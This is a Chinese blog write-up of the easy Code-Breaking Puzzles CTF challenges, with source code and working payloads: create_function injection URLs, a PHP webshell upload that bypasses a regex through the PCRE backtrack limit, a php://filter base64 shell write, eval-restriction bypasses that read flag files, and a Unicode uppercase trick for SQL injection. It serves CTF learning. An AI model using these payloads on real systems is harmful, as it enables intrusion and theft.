Code-Breaking Puzzles easy学习篇

代码审计知识星球二周年,P牛出了几道质量相当贼很高的题目,个人实力比较菜,这里记录一哈复现收获,当然也欢迎加入【代码审计】知识星球,一起进步。
介绍具体可以看这里

题目链接

https://code-breaking.com/#promo-block

题目考点

1.function PHP函数利用技巧(create_function)
2.pcrewaf PHP正则特性
3.phpmagic PHP写文件技巧
4.phplimit PHP代码执行限制绕过
5.nodechr Javascript字符串特性
6.javacon SPEL表达式沙盒绕过
7.lumenserial 反序列化在7.2下的利用
8.picklecode Python反序列化沙盒绕过
9.thejs Javascript对象特性利用

easy - function

提交:114, 正确:90
等级:easy
所有代码都在题目中。
puzzle url: http://51.158.75.42:8087/

题目环境

Apache/2.4.25 (Debian)
PHP/7.2.12
<?php
$action = $_GET['action'] ?? '';
$arg = $_GET['arg'] ?? '';

if(preg_match('/^[a-z0-9_]*$/isD', $action)) {
    show_source(__FILE__);  //如果action只是由a-z0-9_组成的,则显示源码
} else {
    $action('', $arg);  //题目意思是将action当作方法,arg为传入的参数执行。
}

p牛在圈中针对这到题如下叙述
code-breaking puzzles第一题,function,为什么函数前面可以加一个%5c?奇技淫巧
其实简单的不行,php里默认命名空间是\,所有原生函数和类都在这个命名空间中。普通调用一个函数,如果直接写函数名function_name()调用,调用的时候其实相当于写了一个相对路径;而如果写\function_name() 这样调用函数,则其实是写了一个绝对路径。
如果你在其他namespace里调用系统类,就必须写绝对路径这种写法。

这里感觉和tp框架的命名开头声明类似

参考wp之后这里利用了create_function函数,详细情况可以参考这里
create_function('$a',$str2);
这里其实就是将获取到的$a以字符串的形式拼接到了php代码中,这里与eval这个函数类似。
然后照猫化虎制作如下paylaod

http://51.158.75.42:8087/?action=\create_function&arg=2;}phpinfo();/*

至于action=\create_function,P神前面已经解释的很清晰了,命名空间问题,而且这里正好可以绕过preg,剩下就很简单了。
直接丢几个paylaod

http://51.158.75.42:8087/?action=\create_function&arg=2;}print_r(scandir('../'));/*
http://51.158.75.42:8087/?action=\create_function&arg=2;}print_r(file_get_contents('../flag_h0w2execute_arb1trary_c0de'));/*

easy - pcrewaf

提交:73, 正确:52
难度:easy
所有代码都在URL里。
URL: http://51.158.75.42:8088/
题目环境

Apache/2.4.25 (Debian)
PHP/7.1.24
<?php
function is_php($data){
    return preg_match('/<\?.*[(`;?>].*/is', $data);
}

if(empty($_FILES)) {
    die(show_source(__FILE__));
}

$user_dir = 'data/' . md5($_SERVER['REMOTE_ADDR']);
$data = file_get_contents($_FILES['file']['tmp_name']);
if (is_php($data)) {
    echo "bad request";
} else {
    @mkdir($user_dir, 0755);
    $path = $user_dir . '/' . random_int(0, 10) . '.php';
    move_uploaded_file($_FILES['file']['tmp_name'], $path);

    header("Location: $path", true, 303);
} 1

这道题的难点就在于

if (is_php($data)) {
    echo "bad request";
}  //验证包含了所有正常的php代码

preg_match的绕过可以参考这里

import requests
from io import BytesIO

files = {
  'file': BytesIO(b'aaa<?php eval($_POST[txt]);//' + b'a' * 1000000)
}

res = requests.post('http://51.158.75.42:8088/index.php', files=files, allow_redirects=False)
print(res.headers)
http://51.158.75.42:8088/data/62926ad520796d62d12812369d2908fb/9.php?a=print_r(scandir('../../../'));
http://51.158.75.42:8088/data/62926ad520796d62d12812369d2908fb/9.php?a=var_dump(file_get_contents('../../../flag_php7_2_1s_c0rrect'));

这道题可以说收获很大,也是第一次意识到如此preg_replace不安全

easy - phpmagic

提交:30, 正确:25
难度:easy
源码:http://51.158.75.42:8082/index.php?read-source=1
URL: http://51.158.75.42:8082/

Apache/2.4.10 (Debian)
PHP/5.6.33
<?php
define('DATA_DIR', dirname(__FILE__) . '/data/' . md5($_SERVER['REMOTE_ADDR']));

if(!is_dir(DATA_DIR)) {
mkdir(DATA_DIR, 0755, true);
}
chdir(DATA_DIR);        
$domain   = isset($_POST['domain']) ? $_POST['domain'] : '';
$log_name = isset($_POST['log']) ? $_POST['log'] : date('-Y-m-d');
?>

<?php 
if(!empty($_POST) && $domain):
$command  = sprintf("dig -t A -q %s", escapeshellarg($domain));
$output   = shell_exec($command);
$output   = htmlspecialchars($output, ENT_HTML401 | ENT_QUOTES);

$log_name = $_SERVER['SERVER_NAME'] . $log_name;

if(!in_array(pathinfo($log_name, PATHINFO_EXTENSION), ['php', 'php3', 'php4', 'php5', 'phtml', 'pht'], true)) {
file_put_contents($log_name, $output);
}
echo $output;
endif; 
?>

这里php后缀使用php/.绕过,php在处理路径的时候,会递归的删除掉路径中存在的/.

另外file_put_contents可以参考这里
base64解码是4位4位一组,如果base64编码不是4的倍数,就可以在/*后随便添加点fuzz字符补齐就好。
至于$_SERVER['SERVER_NAME']的伪造,这里直接就是传递的Host
最后的POC

POST / HTTP/1.1
Host: php
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 126
Referer: http://51.158.75.42:8082/
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1

domain=PD89YG5sIC4uLy4uLy4uL2ZsYWdfcGhwbWFnMWNfdXIxYDsvKipzZGRk&log=://filter/write/convert.base64-decode/resource=test4.php/.

群里还有一种讨论方法是apache的php%0a绕过。

easy - phplimit

提交:41, 正确:40
难度:easy
所有代码都在页面中。
URL:http://51.158.75.42:8084/

nginx/1.15.6
PHP/5.6.38
 <?php
if(';' === preg_replace('/[^\W]+\((?R)?\)/', '', $_GET['code'])) {    
    eval($_GET['code']);
} else {
    show_source(__FILE__);
}

代码很短,这里会把code最内括号内的内容替换为空,利用难度还是很大的,这里分析一哈师傅们的奇淫技巧。

session_id

GET /?code=eval(hex2bin(session_id(session_start())));

PHPSESSID=7072696e745f722866696c655f6765745f636f6e74656e747328272e2e2f666c61675f7068706279703473732729293b
#print_r(file_get_contents('../flag_phpbyp4ss'));

session_id用于获取PHPSESSID的值
session_start()为使用当前cookie中的会话
hex2bin则将16进制转换为二进制,根据手册,只是换了一种存储方式,解决编码转换问题,本质没有变换。

get_defined_vars

http://51.158.75.42:8084/
?code=eval(next(current(get_defined_vars())));
&b=print_r(scandir('../'));print_r(file_get_contents('../flag_phpbyp4ss'));

官方手册描述如下:

array get_defined_vars ( void )
此函数返回一个包含所有已定义变量列表的多维数组,这些变量包括环境变量、服务器变量和用户定义的变量。

这个函数感觉权限很大
current — 返回数组中的当前单元
next()current() 的行为类似,只有一点区别,在返回值之前将内部指针向前移动一位。这意味着它返回的是下一个数组单元的值并将数组指针向前移动了一位。

arrary_reverse&scandir

code=readfile(next(array_reverse(scandir(dirname(chdir(dirname(getcwd())))))));

getcwd — 取得当前工作目录
dirname — 返回路径中的目录部分,给出一个包含有指向一个文件的全路径的字符串,本函数返回去掉文件名后的目录名。
chdir — 改变目录
scandir — 列出指定路径中的文件和目录,返回一个 array,包含有 directory 中的文件和目录。
array_reverse — 返回单元顺序相反的数组,接受数组 array 作为输入并返回一个单元为相反顺序的新数组(只有两个文件)。

类似题目

这到题目与RCTF 2018的r-cursive(apache)类似,环境不同。

easy - nodechr

提交:14, 正确:13
难度:easy
源码:http://51.158.73.123:8085/source
URL: http://51.158.73.123:8085/

// initial libraries
const Koa = require('koa')
const sqlite = require('sqlite')
const fs = require('fs')
const views = require('koa-views')
const Router = require('koa-router')
const send = require('koa-send')
const bodyParser = require('koa-bodyparser')
const session = require('koa-session')
const isString = require('underscore').isString
const basename = require('path').basename

const config = JSON.parse(fs.readFileSync('../config.json', {encoding: 'utf-8', flag: 'r'}))

async function main() {
    const app = new Koa()
    const router = new Router()
    const db = await sqlite.open(':memory:')

    await db.exec(`CREATE TABLE "main"."users" (
        "id" INTEGER NOT NULL PRIMARY KEY AUTOINCREMENT,
        "username" TEXT NOT NULL,
        "password" TEXT,
        CONSTRAINT "unique_username" UNIQUE ("username")
    )`)
    await db.exec(`CREATE TABLE "main"."flags" (
        "id" INTEGER NOT NULL PRIMARY KEY AUTOINCREMENT,
        "flag" TEXT NOT NULL
    )`)
    for (let user of config.users) {
        await db.run(`INSERT INTO "users"("username", "password") VALUES ('${user.username}', '${user.password}')`)
    }
    await db.run(`INSERT INTO "flags"("flag") VALUES ('${config.flag}')`)

    router.all('login', '/login/', login).get('admin', '/', admin).get('static', '/static/:path(.+)', static).get('/source', source)

    app.use(views(__dirname + '/views', {
        map: {
            html: 'underscore'
        },
        extension: 'html'
    })).use(bodyParser()).use(session(app))
    
    app.use(router.routes()).use(router.allowedMethods());
    
    app.keys = config.signed
    app.context.db = db
    app.context.router = router
    app.listen(3000)
}

function safeKeyword(keyword) {
    if(isString(keyword) && !keyword.match(/(union|select|;|\-\-)/is)) {
        return keyword
    }

    return undefined
}

async function login(ctx, next) {
    if(ctx.method == 'POST') {
        let username = safeKeyword(ctx.request.body['username'])
        let password = safeKeyword(ctx.request.body['password'])

        let jump = ctx.router.url('login')
        if (username && password) {
            let user = await ctx.db.get(`SELECT * FROM "users" WHERE "username" = '${username.toUpperCase()}' AND "password" = '${password.toUpperCase()}'`)

            if (user) {
                ctx.session.user = user

                jump = ctx.router.url('admin')
            }

        }

        ctx.status = 303
        ctx.redirect(jump)
    } else {
        await ctx.render('index')
    }
}

async function static(ctx, next) {
    await send(ctx, ctx.path)
}

async function admin(ctx, next) {
    if(!ctx.session.user) {
        ctx.status = 303
        return ctx.redirect(ctx.router.url('login'))
    }

    await ctx.render('admin', {
        'user': ctx.session.user
    })
}

async function source(ctx, next) {
    await send(ctx, basename(__filename))
}

main()

关键部分为

function safeKeyword(keyword) {
    if(isString(keyword) && !keyword.match(/(union|select|;|\-\-)/is)) {
        return keyword
    }

    return undefined
}

async function login(ctx, next) {
    if(ctx.method == 'POST') {
        let username = safeKeyword(ctx.request.body['username'])
        let password = safeKeyword(ctx.request.body['password'])
        let jump = ctx.router.url('login')
        if (username && password) {
            let user = await ctx.db.get(`SELECT * FROM "users" WHERE "username" = '${username.toUpperCase()}' AND "password" = '${password.toUpperCase()}'`)
......
}

这里先进行safe,在进行toUpperCase()。
当然,关键点就在于toUpperCase(),这里可以参考这篇文章,同时也给出了fuzz的方法

"ı".toUpperCase() == 'I'
"ſ".toUpperCase() == 'S'

之后就是很简单的sql注入了。

类似的题目

在刚刚过去的HCTF中admin题目,可以参考这里

感悟

作为一个萌新,学到了很多东西,也学到了好多骚操作。做安全还是应该沉下心来,这里只记录了easy的题目,如果有理解不到位的地方,也非常欢迎指出,共同交流进步。

参考

http://blog.51cto.com/lovexm/1743442
https://www.leavesongs.com/PENETRATION/use-pcre-backtrack-limit-to-bypass-restrict.html
https://www.leavesongs.com/PENETRATION/php-filter-magic.html
https://www.leavesongs.com/HTML/javascript-up-low-ercase-tip.html
https://www.kingkk.com/2018/11/Code-Breaking-Puzzles-%E9%A2%98%E8%A7%A3-%E5%AD%A6%E4%B9%A0%E7%AF%87/#nodechr
https://www.cnblogs.com/iamstudy/articles/code_breaking_writeup.html
http://f1sh.site/2018/11/25/code-breaking-puzzles%E5%81%9A%E9%A2%98%E8%AE%B0%E5%BD%95/

©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 148,637评论 1 318
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 63,443评论 1 266
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 99,164评论 0 218
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 42,075评论 0 188
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 50,080评论 1 266
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 39,365评论 1 184
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 30,901评论 2 283
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 29,649评论 0 176
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 33,122评论 0 223
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 29,734评论 2 225
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 31,093评论 1 236
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 27,548评论 2 222
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 32,028评论 3 216
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 25,765评论 0 9
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 26,291评论 0 178
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 34,162评论 2 239
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 34,293评论 2 242

推荐阅读更多精彩内容